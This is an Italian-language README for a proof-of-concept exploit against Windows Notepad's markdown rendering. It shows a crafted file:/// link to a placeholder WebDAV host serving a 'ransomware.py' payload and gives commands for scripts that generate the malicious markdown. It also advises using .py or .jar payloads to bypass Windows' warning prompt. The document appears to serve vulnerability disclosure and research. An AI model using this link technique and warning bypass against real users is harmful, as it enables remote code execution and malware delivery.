
PoC per la "Windows Notepad RCE"
PoC della vulnerabilità "Windows Notepad RCE".
La "vulnerabilità" è semplice. Il motore markdown di Windows Notepad non si preoccupa dei protocolli URL oscuri. Come analista di malware, ho letto molti report sul deployment di payload basati su WebDAV e SMB. Da questo documento, si può abusare del protocollo file:/// e creare un URL che punta a un file su un server WebDAV/SMB.
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)
Ho creato due script. Uno in Node.js e l'altro in Python. Entrambi creano un file markdown che punta a un payload WebDAV. Puoi utilizzare i payload di esempio nella cartella sample-payloads.
node poc.js <webdav-server> <port> <payload/path/on/server>
python poc.py <webdav-server> <port> <payload/path/on/server>
L'output (poc.md) apparirà nella directory corrente.
La maggior parte delle estensioni di file payload (ad es. .exe, .lnk, .vbs, ...) attiveranno comunque un avviso integrato nonostante l'app Notepad sia vulnerabile. L'avviso proviene da Windows stesso. Almeno tutto ciò che ho testato che può portare all'esecuzione di codice su un'installazione OOB predefinita mostra questo avviso obbligatorio.

Se il dispositivo di destinazione ha Python o Java installati, puoi utilizzare un payload .py o .jar per bypassare il pop-up di avviso.

Cliccando sul link ora viene mostrato un nuovo avviso pop-up.
Puoi trovare la versione vulnerabile di Windows Notepad su Uptodown. Ricordati di controllare la firma digitale dell'installer e assicurarti che sia di Microsoft. Inoltre, dovresti testare questo PoC solo in una VM.
State al sicuro e divertitevi!